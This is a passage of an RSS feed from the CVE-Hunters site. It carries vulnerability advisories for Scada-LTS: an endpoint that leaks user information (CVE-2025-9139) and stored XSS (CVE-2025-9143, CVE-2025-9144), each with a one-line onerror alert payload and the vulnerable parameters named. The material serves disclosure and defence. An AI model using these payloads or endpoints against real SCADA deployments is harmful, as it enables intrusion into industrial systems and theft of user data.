&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.email=&amp;amp;#34;user1@x.com&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.phone=&amp;amp;#34;13212313131&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;s11.username=&amp;amp;#34;user1&amp;amp;#34;;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;authenticate-as-any-valid-low-privileged-user&amp;#34;&amp;gt;Authenticate as any valid low-privileged user.
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9139/image.png&amp;#34;
	width=&amp;#34;1902&amp;#34;
	height=&amp;#34;320&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9139/image_hu_c33d08b2cce4521c.png 480w, /p/cve-2025-9139/image_hu_7747a0e6ad4d8864.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;594&amp;#34;
		data-flex-basis=&amp;#34;1426px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;send-the-above-post-request-to-scada-ltsdwrcallplaincallwatchlistdwrinitdwr&amp;#34;&amp;gt;Send the above POST request to &amp;lt;code&amp;gt;/Scada-LTS/dwr/call/plaincall/WatchListDwr.init.dwr&amp;lt;/code&amp;gt;
&amp;lt;/h3&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9139/image-1.png&amp;#34;
	width=&amp;#34;1680&amp;#34;
	height=&amp;#34;776&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9139/image-1_hu_ff5188c788d16204.png 480w, /p/cve-2025-9139/image-1_hu_73d12e3ba16d4378.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;216&amp;#34;
		data-flex-basis=&amp;#34;519px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h3 id=&amp;#34;observe-the-server-response-containing-sensitive-information-of-all-users-in-the-scada-system&amp;#34;&amp;gt;Observe the server response containing sensitive information of all users in the SCADA system
&amp;lt;/h3&amp;gt;&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Privacy Violation: Emails, phone numbers, and usernames of all users, including administrators, are exposed.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Privilege Escalation Support: Knowledge of admin usernames and roles could be leveraged in further attacks.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Phishing and Social Engineering: Exposed contact information can be used to craft highly targeted attacks.&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Reconnaissance: Attackers can map the user structure of the SCADA-LTS system for further exploitation.
&amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/Scada-LTS/CVE-2025-9139.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9143</title>
        <link>https://www.cvehunters.com/p/cve-2025-9143/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9143/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9143-multiples-cross-site-scripting-xss-stored-in-endpoint-mailing_listsshtm&amp;#34;&amp;gt;CVE-2025-9143: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9143-multiples-cross-site-scripting-xss-stored-in-endpoint-mailing_listsshtm&amp;#34;&amp;gt;CVE-2025-9143: Multiples Cross-Site Scripting (XSS) Stored in endpoint &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9143&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Multiples Stored Cross-Site Scripting (XSS) vulnerabilities was identified in the &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt; parameters. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;mailing_lists.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameters: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;, &amp;lt;code&amp;gt;userList&amp;lt;/code&amp;gt; and &amp;lt;code&amp;gt;address&amp;lt;/code&amp;gt; parameters. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(40)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image.png&amp;#34;
	width=&amp;#34;651&amp;#34;
	height=&amp;#34;282&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image_hu_f77d2b1f1c4b31b9.png 480w, /p/cve-2025-9143/image_hu_a232c9a2c6913e32.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;230&amp;#34;
		data-flex-basis=&amp;#34;554px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image-1.png&amp;#34;
	width=&amp;#34;631&amp;#34;
	height=&amp;#34;309&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image-1_hu_e0bceb375f809227.png 480w, /p/cve-2025-9143/image-1_hu_255f4bd3b7c4235d.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;204&amp;#34;
		data-flex-basis=&amp;#34;490px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9143/image-2.png&amp;#34;
	width=&amp;#34;635&amp;#34;
	height=&amp;#34;301&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9143/image-2_hu_e954bce300e18350.png 480w, /p/cve-2025-9143/image-2_hu_c4a2e415bf078fda.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;210&amp;#34;
		data-flex-basis=&amp;#34;506px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9143.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9144</title>
        <link>https://www.cvehunters.com/p/cve-2025-9144/</link>
        <guid>https://www.cvehunters.com/p/cve-2025-9144/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9144-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9144: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9144-cross-site-scripting-xss-stored-endpoint-publisher_editshtm-parameter-name&amp;#34;&amp;gt;CVE-2025-9144: Cross-Site Scripting (XSS) Stored endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parameter &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9144&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;summary&amp;#34;&amp;gt;Summary
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A Stored Cross-Site Scripting (XSS) vulnerability was identified in the &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; endpoint of the Scada-LTS application. This vulnerability allows attackers to inject malicious scripts into the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. The injected scripts are stored on the server and executed automatically whenever the affected page is accessed by users, posing a significant security risk.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;details&amp;#34;&amp;gt;Details
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Vulnerable Endpoint: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parameter: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;The application fails to properly validate and sanitize user inputs in the &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; parameter. This lack of validation allows attackers to inject malicious scripts, which are then stored on the server. Whenever the affected page is accessed, the malicious payload is executed in the victim&amp;#39;s browser, potentially compromising the user&amp;#39;s data and system.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(32)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9144/image.png&amp;#34;
	width=&amp;#34;632&amp;#34;
	height=&amp;#34;301&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9144/image_hu_74749039920d3c9.png 480w, /p/cve-2025-9144/image_hu_425acfacce4d9280.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;209&amp;#34;
		data-flex-basis=&amp;#34;503px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impact&amp;#34;&amp;gt;Impact
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
  &amp;lt;ul&amp;gt;
    &amp;lt;li&amp;gt;Stealing session cookies: Attackers can use stolen session cookies to hijack a user&amp;#39;s session and perform actions on their behalf.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Downloading malware: Attackers can trick users into downloading and installing malware on their computers.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Hijacking browsers: Attackers can hijack a user&amp;#39;s browser or deliver browser-based exploits.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Stealing credentials: Attackers can steal a user&amp;#39;s credentials.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Obtaining sensitive information: Attackers can obtain sensitive information stored in a user&amp;#39;s account or in their browser.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Defacing websites: Attackers can deface a website by altering its content.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Misdirecting users: Attackers can change the instructions given to users who visit the target website, misdirecting their behavior.&amp;lt;/li&amp;gt;
    &amp;lt;li&amp;gt;Damaging a business&amp;#39;s reputation: Attackers can damage a business&amp;#39;s image or spread misinformation by defacing a corporate website.&amp;lt;/li&amp;gt;
  &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;reference&amp;#34;&amp;gt;Reference
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9144.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;finder&amp;#34;&amp;gt;Finder
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
